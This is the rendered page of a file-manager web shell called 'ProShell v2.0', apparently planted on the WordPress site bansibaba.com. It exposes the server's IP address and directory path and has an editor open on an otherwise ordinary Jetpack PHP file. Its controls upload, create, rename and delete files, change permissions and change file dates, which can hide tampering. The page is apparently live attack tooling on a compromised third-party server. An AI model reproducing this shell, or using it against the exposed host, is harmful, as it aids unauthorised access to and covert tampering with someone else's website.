ProShell v2.0
Dashboard
Server Info
Server: 158.106.128.192
PHP: 8.2.33
home
planet5
public_html
bansibaba.com
wp-includes
2026-09-13 11:12:28
Editing: custom-content-types.php
Cancel
Save Changes
<?php /** * Module Name: Custom content types * Module Description: Display different types of content on your site with custom content types. * First Introduced: 3.1 * Requires Connection: No * Auto Activate: Yes * Module Tags: Writing * Sort Order: 34 * Feature: Writing * Additional Search Queries: cpt, custom post types, portfolio, portfolios, testimonial, testimonials */ function jetpack_load_custom_post_types() { include dirname( __FILE__ ) . "/custom-post-types/portfolios.php"; } function jetpack_custom_post_types_loaded() { Jetpack::enable_module_configurable( __FILE__ ); Jetpack::module_configuration_load( __FILE__, 'jetpack_custom_post_types_configuration_load' ); } add_action( 'jetpack_modules_loaded', 'jetpack_custom_post_types_loaded' ); function jetpack_custom_post_types_configuration_load() { wp_safe_redirect( admin_url( 'options-writing.php#cpt-options' ) ); exit; } // Add Settings Section for CPT function jetpack_cpt_settings_api_init() { add_settings_section( 'jetpack_cpt_section', '<span id="cpt-options">' . __( 'Your Custom Content Types', 'jetpack' ) . '</span>', 'jetpack_cpt_section_callback', 'writing' ); } add_action( 'admin_init', 'jetpack_cpt_settings_api_init' ); /* * Settings Description */ function jetpack_cpt_section_callback() { ?> <p> <?php esc_html_e( 'Use these settings to display different types of content on your site.', 'jetpack' ); ?> <a target="_blank" href="http://jetpack.com/support/custom-content-types/"><?php esc_html_e( 'Learn More', 'jetpack' ); ?></a> </p> <?php } jetpack_load_custom_post_types();
Upload Files
Cancel
Upload
Create New
Cancel
Create
Change Permissions
Cancel
Save
Change Date
Cancel
Save
Rename Item
Cancel
Save
Confirm Delete
Are you sure you want to delete the selected items?
Cancel
Delete